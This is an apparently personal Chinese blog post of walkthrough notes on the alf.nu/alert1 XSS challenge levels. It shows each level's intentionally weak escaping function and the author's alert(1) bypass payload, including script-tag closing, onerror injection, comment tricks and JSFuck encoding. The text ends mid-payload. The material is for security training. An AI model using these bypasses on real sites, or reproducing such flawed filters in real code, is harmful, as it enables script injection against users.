<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"juniorprincewang.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.18.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="在做 alf.nu&#x2F;alert1 时候的一些总结，主要是xss这种低安全级别的注意事项。">
<meta property="og:type" content="article">
<meta property="og:title" content="alf.nu&#x2F;alert1总结">
<meta property="og:url" content="http://juniorprincewang.github.io/2018/10/14/alf-nu-alert1%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="TO DO">
<meta property="og:description" content="在做 alf.nu&#x2F;alert1 时候的一些总结，主要是xss这种低安全级别的注意事项。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2018-10-14T04:39:04.000Z">
<meta property="article:modified_time" content="2022-01-09T11:09:07.883Z">
<meta property="article:author" content="Max">
<meta property="article:tag" content="xss">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://juniorprincewang.github.io/2018/10/14/alf-nu-alert1%E6%80%BB%E7%BB%93/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://juniorprincewang.github.io/2018/10/14/alf-nu-alert1%E6%80%BB%E7%BB%93/","path":"2018/10/14/alf-nu-alert1总结/","title":"alf.nu/alert1总结"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>alf.nu/alert1总结 | TO DO</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="/custom_css_source.css">
<!-- hexo injector head_end end --><!-- hexo-inject:begin --><!-- hexo-inject:end --></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">TO DO</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">吾尝终日而思矣，不如须臾之所学也。</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#adobe"><span class="nav-number">1.</span> <span class="nav-text">Adobe</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#json"><span class="nav-number">2.</span> <span class="nav-text">JSON</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#javascript"><span class="nav-number">3.</span> <span class="nav-text">JavaScript</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#markdown"><span class="nav-number">4.</span> <span class="nav-text">Markdown</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dom"><span class="nav-number">5.</span> <span class="nav-text">DOM</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#callback"><span class="nav-number">6.</span> <span class="nav-text">Callback</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#skandia"><span class="nav-number">7.</span> <span class="nav-text">Skandia</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#template"><span class="nav-number">8.</span> <span class="nav-text">Template</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#json2"><span class="nav-number">9.</span> <span class="nav-text">JSON2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#callback2"><span class="nav-number">10.</span> <span class="nav-text">Callback2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#skandia-2"><span class="nav-number">11.</span> <span class="nav-text">Skandia 2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#jsfuck"><span class="nav-number">11.1.</span> <span class="nav-text">jsfuck</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#iframe"><span class="nav-number">12.</span> <span class="nav-text">iframe</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#tism"><span class="nav-number">13.</span> <span class="nav-text">TI(S)M</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#json-3"><span class="nav-number">14.</span> <span class="nav-text">JSON 3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#kzk"><span class="nav-number">15.</span> <span class="nav-text">K&#39;Z&#39;K</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E8%A1%A5%E7%BB%99"><span class="nav-number"></span> <span class="nav-text">知识补给</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#js"><span class="nav-number">1.</span> <span class="nav-text">JS</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number"></span> <span class="nav-text">参考</span></a></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Max</p>
  <div class="site-description" itemprop="description">文章本天成，妙手偶得之。</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">97</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">34</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">102</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/juniorprincewang" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;juniorprincewang" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:maxzywang@163.com" title="E-Mail → mailto:maxzywang@163.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://juniorprincewang.github.io/2018/10/14/alf-nu-alert1%E6%80%BB%E7%BB%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Max">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="TO DO">
      <meta itemprop="description" content="文章本天成，妙手偶得之。">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="alf.nu/alert1总结 | TO DO">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          alf.nu/alert1总结
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2018-10-14 12:39:04" itemprop="dateCreated datePublished" datetime="2018-10-14T12:39:04+08:00">2018-10-14</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2022-01-09 19:09:07" itemprop="dateModified" datetime="2022-01-09T19:09:07+08:00">2022-01-09</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">web安全</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>在做 alf.nu/alert1
时候的一些总结，主要是xss这种低安全级别的注意事项。 <span id="more"></span> # 题目
## warmup <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  return &#x27;&lt;script&gt;console.log(&quot;&#x27;+s+&#x27;&quot;);&lt;/script&gt;&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure> 在html中直接闭合 双引号【"】。</p>
<h2 id="adobe">Adobe</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  s = s.replace(/&quot;/g, &#x27;\\&quot;&#x27;);</span><br><span class="line">  return &#x27;&lt;script&gt;console.log(&quot;&#x27; + s + &#x27;&quot;);&lt;/script&gt;&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里双引号被过滤了，只有想办法绕过过滤。</p>
<ol type="1">
<li>由题可知过滤方法只将【"】替换为了【"】，没有对【】本身进行转义，所以我们可以通过输入【"】来进行绕过，我们的【】会将原本的【】给转义掉，从而实现绕过！</li>
<li>直接闭合 <code>&lt;script&gt;</code> 标签即可。</li>
</ol>
<h2 id="json">JSON</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  s = JSON.stringify(s);</span><br><span class="line">  return &#x27;&lt;script&gt;console.log(&#x27; + s + &#x27;);&lt;/script&gt;&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>json.stringify()方法是将一个JavaScript值转换成Json字符串，将一个传入的对象（这里是字符串）加上双引号，并转义【"】，但是会对
【】 进行转义。
这里其实涉及到html标签的优先级，script标签时具有高优先级的，就是说当我们在script标签中出现了
<code>&lt;/script&gt;</code>标签，那么就会闭合前面那个
<code>&lt;script&gt;</code> ，从而实现绕过。</p>
<h2 id="javascript">JavaScript</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  var url = &#x27;javascript:console.log(&#x27; + JSON.stringify(s) + &#x27;)&#x27;;</span><br><span class="line">  console.log(url);</span><br><span class="line"></span><br><span class="line">  var a = document.createElement(&#x27;a&#x27;);</span><br><span class="line">  a.href = url;</span><br><span class="line">  document.body.appendChild(a);</span><br><span class="line">  a.click();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这次字符串出现在了url中，同样是绕过
【"】，url编码规定在url中url编码会自动解码，但是js是不会解码的，所以url编码后的【"】js是不认识的，所以我们就成功逃过了JSON.stringify对【"】的转义。</p>
<p>【"】 在 url中的编码： <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">from urllib import quote</span><br><span class="line">quote(&quot;\&quot;&quot;)</span><br><span class="line">==&gt; &#x27;%22&#x27;</span><br></pre></td></tr></table></figure></p>
<pre><code>%22);alert(1)//</code></pre>
<h2 id="markdown">Markdown</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  var text = s.replace(/&lt;/g, &#x27;&amp;lt;&#x27;).replace(/&quot;/g, &#x27;&amp;quot;&#x27;);</span><br><span class="line">  // URLs</span><br><span class="line">  text = text.replace(/(http:\/\/\S+)/g, &#x27;&lt;a href=&quot;$1&quot;&gt;$1&lt;/a&gt;&#x27;);</span><br><span class="line">  // [[img123|Description]]</span><br><span class="line">  text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, &#x27;&lt;img alt=&quot;$2&quot; src=&quot;$1.gif&quot;&gt;&#x27;);</span><br><span class="line">  return text;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这是某些markdown语法的实现方式。 第一条代码：
【&lt;】【"】都被转义为html实体。 第二条代码：
将输入的链接自动生成了a标签。 第三条代码： Markdown标准插入图片的语法即
[[src|alt]]，【|】左边遍是图片的src，右边是图片的alt属性。</p>
<p>从第一条可以基本确定我们想要直接输入 <code>&lt;script&gt;</code>
等标签以及双引号是不太可能的了，第二条是关于url的，那么我们可不可以使用javascript伪协议呢？答案是不行，正则规定了只有
http://
开头的才可以生成a标签，那么再看一下最后一条，由于第一条的实体编码导致我们输入【"】与【&lt;】都不行了。
能不能结合所有已知条件看不能创造【"】，输入 http://
什么的时候就会自动生成a标签，a标签中就会有双引号，它正好闭合alt的第一个【"】：</p>
<p>payload <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[[1|http://onerror=alert(1)//]]</span><br></pre></td></tr></table></figure></p>
<h2 id="dom">DOM</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  // Slightly too lazy to make two input fields.</span><br><span class="line">  // Pass in something like &quot;TextNode#foo&quot;</span><br><span class="line">  var m = s.split(/#/);</span><br><span class="line"></span><br><span class="line">  // Only slightly contrived at this point.</span><br><span class="line">  var a = document.createElement(&#x27;div&#x27;);</span><br><span class="line">  a.appendChild(document[&#x27;create&#x27;+m[0]].apply(document, m.slice(1)));</span><br><span class="line">  return a.innerHTML;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个题目目的是JavaScript中DOM创建DOM节点。我们的目的就是能够执行
<code>alert(1)</code>，那么创建dom节点就那么几个方法，像
<code>Element</code>、 <code>TextNode</code>
这种就没机会了，一个是只能淡出创建空标签，一个是只能输出纯文本，都不能利用。
其他方法还包括Comment，它创建的节点为 <code>&lt;!-- node --&gt;</code>
我们需要闭合 <code>&lt;!--</code> 即可。</p>
<p><a
target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/API/Document/createComment">document.createComment</a></p>
<h2 id="callback">Callback</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  // Pass inn &quot;callback#userdata&quot;</span><br><span class="line">  var thing = s.split(/#/); </span><br><span class="line"></span><br><span class="line">  if (!/^[a-zA-Z\[\]&#x27;]*$/.test(thing[0])) return &#x27;Invalid callback&#x27;;</span><br><span class="line">  var obj = &#123;&#x27;userdata&#x27;: thing[1] &#125;;</span><br><span class="line">  var json = JSON.stringify(obj).replace(/&lt;/g, &#x27;\\u003c&#x27;);</span><br><span class="line">  return &quot;&lt;script&gt;&quot; + thing[0] + &quot;(&quot; + json +&quot;)&lt;/script&gt;&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>回调函数是有限制的（只能由字母、[、]、单引号组成），不能用任意的，obj是一个序列化后的对象，json转换函数中将【&lt;】替换为十六进制的编码03C，这个过滤导致我们无法使用这样的标签。我们可控的就callback与obj的值，callback不一定要是一个函数，我们需要做的就是闭合
<code>(&#123;"userdata":"</code>
这段字符串想办法绕过obj，让它不在是一个对象，否则我们是不可能弹窗的:</p>
<p>payload <code>'#';alert(1)//</code></p>
<h2 id="skandia">Skandia</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  return &#x27;&lt;script&gt;console.log(&quot;&#x27; + s.toUpperCase() + &#x27;&quot;)&lt;/script&gt;&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这道题目中没有过滤函数，仅仅只有一个大小写函数。
目标：还是通过关闭存在的 <code>&lt;script&gt;</code>
标签创建一个对大小写不敏感的标签来执行 <code>onerror</code> 函数。
需要注意的是 JS 对大小写敏感，html 对大小写不敏感。 那么可以创建
<code>&lt;img&gt;</code> 标签，利用其属性函数 <code>onerror</code> ，
将它赋值为 <code>alert(1)</code>，并转换 alter为
<code>html实体字符</code> 就可以完成任务。</p>
<p>html 字符实体类似这样：</p>
<blockquote>
<p>&amp;entity_name; 或者 &amp;#entity_number;</p>
</blockquote>
<p>如需显示小于号，我们必须这样写：<code>&amp;lt;</code> 或
<code>&amp;#60;</code> 或 <code>&amp;#x3c;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">binascii.hexlify(&#x27;alert&#x27;)</span><br><span class="line">Out: &#x27;616c657274&#x27;</span><br></pre></td></tr></table></figure>
<p>写img标签时，需要加上 <code>src</code> 属性。</p>
<p><code>&lt;/script&gt;&lt;img src onerror=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt;</code>
or
<code>&lt;/script&gt;&lt;img src onerror=&amp;#x61&amp;#x6c&amp;#x65&amp;#x72&amp;#x74(1)&gt;</code></p>
<h2 id="template">Template</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  function htmlEscape(s) &#123;</span><br><span class="line">    return s.replace(/./g, function(x) &#123;</span><br><span class="line">       return &#123; &#x27;&lt;&#x27;: &#x27;&amp;lt;&#x27;, &#x27;&gt;&#x27;: &#x27;&amp;gt;&#x27;, &#x27;&amp;&#x27;: &#x27;&amp;amp;&#x27;, &#x27;&quot;&#x27;: &#x27;&amp;quot;&#x27;, &quot;&#x27;&quot;: &#x27;&amp;#39;&#x27; &#125;[x] || x;       </span><br><span class="line">     &#125;);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function expandTemplate(template, args) &#123;</span><br><span class="line">    return template.replace(</span><br><span class="line">        /&#123;(\w+)&#125;/g, </span><br><span class="line">        function(_, n) &#123; </span><br><span class="line">           return htmlEscape(args[n]);</span><br><span class="line">         &#125;);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  return expandTemplate(</span><br><span class="line">    &quot;                                                \n\</span><br><span class="line">      &lt;h2&gt;Hello, &lt;span id=name&gt;&lt;/span&gt;!&lt;/h2&gt;         \n\</span><br><span class="line">      &lt;script&gt;                                       \n\</span><br><span class="line">         var v = document.getElementById(&#x27;name&#x27;);    \n\</span><br><span class="line">         v.innerHTML = &#x27;&lt;a href=#&gt;&#123;name&#125;&lt;/a&gt;&#x27;;       \n\</span><br><span class="line">      &lt;\/script&gt;                                     \n\</span><br><span class="line">    &quot;,</span><br><span class="line">    &#123; name : s &#125;</span><br><span class="line">  );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>最后一个return，调用 <code>expandTemplate</code>
函数对一串html元素处理，而 <code>expandTemplate</code>
函数定义里面又调用了 <code>htmlEscape</code> ， <code>htmlEscape</code>
对 单双引号，&amp;和&lt;,&gt;都转化为html实体字符了，但没过滤。</p>
<p><code>innerHTML</code> 是 JS 字符串，使用十进制或者是十六进制来替换
【&lt;】，【&gt;】，来绕过这个函数。</p>
<p><code>\x3cimg src onerror=alert(1)\x3e</code> or
<code>\u003cimg src=a onerror=alert(1)\u003e</code></p>
<h2 id="json2">JSON2</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  s = JSON.stringify(s).replace(/&lt;\/script/gi, &#x27;&#x27;);</span><br><span class="line"></span><br><span class="line">  return &#x27;&lt;script&gt;console.log(&#x27; + s + &#x27;);&lt;/script&gt;&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>stringify可转义【"】，并且转义【】，<code>&lt;/script</code>
根据正则表达式替换成空字符串。g是全局模式，i就忽略大小写。</p>
<p>对付这种正则表达式的办法用字符串拼接。将替换成空的字符串嵌入到目标字符串中。</p>
<p>payload:
<code>&lt;/&lt;/scriptscript&gt;&lt;script&gt;alert(1)//</code></p>
<p>output
<code>&lt;script&gt;console.log("&lt;/script&gt;&lt;script&gt;alert(1)//");&lt;/script&gt;</code></p>
<h2 id="callback2">Callback2</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  // Pass inn &quot;callback#userdata&quot;</span><br><span class="line">  var thing = s.split(/#/); </span><br><span class="line"></span><br><span class="line">  if (!/^[a-zA-Z\[\]&#x27;]*$/.test(thing[0])) return &#x27;Invalid callback&#x27;;</span><br><span class="line">  var obj = &#123;&#x27;userdata&#x27;: thing[1] &#125;;</span><br><span class="line">  var json = JSON.stringify(obj).replace(/\//g, &#x27;\\/&#x27;);</span><br><span class="line">  return &quot;&lt;script&gt;&quot; + thing[0] + &quot;(&quot; + json +&quot;)&lt;/script&gt;&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>与 <code>Callback</code>
题目类似的，不同之处在于在本题中过滤了反斜杠。这就导致了
<code>Callback</code>的答案中的注释 <code>//</code>
是无法使用的。但是鉴于最后的JavaScript的代码会嵌入了html代码中，因此可以考虑使用html的注释方法来完成本题。
javascript 的注释是有三种的，分别为 <code>//</code> <code>/**/</code>
<code>&lt;!--</code>。</p>
<p>payload: <code>'#';alert(1)&lt;!--</code></p>
<p>Output
<code>&lt;script&gt;'(&#123;"userdata":"';alert(1)&lt;!--"&#125;)&lt;/script&gt;</code></p>
<h2 id="skandia-2">Skandia 2</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  if (/[&lt;&gt;]/.test(s)) return &#x27;-&#x27;;</span><br><span class="line"></span><br><span class="line">  return &#x27;&lt;script&gt;console.log(&quot;&#x27; + s.toUpperCase() + &#x27;&quot;)&lt;/script&gt;&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>一旦匹配到 【&lt;】 和 【&gt;】 就会直接返回
<code>-</code>，又检查大写，但是不能输入 <code>&lt;</code> 和
<code>&gt;</code> ，能不能对alert变换一下呢。 参考其他的博客，都说用到了
<code>jsfuck</code>。</p>
<h3 id="jsfuck">jsfuck</h3>
<p>jsfuck 以这种风格写成的代码中仅使用 <code>[</code> 、
<code>]</code>、 <code>(</code>、 <code>)</code>、 <code>!</code> 和
<code>+</code>
六种字符。此编程风格的名字派生自仅使用较少符号写代码的Brainfuck语言。但与其他深奥编程语言不同的是，以JSFuck风格写出的代码不需要另外的编译器或解释器来执行，无论浏览器或JavaScript引擎中的原生JavaScript解释器皆可直接运行。</p>
<p>加密网站：http://www.jsfuck.com/</p>
<p>这里仅需要将 <code>");alert(1)//</code> 中的
<code>alert(1)</code>用jsfuck语言表示出来即可。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;);[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[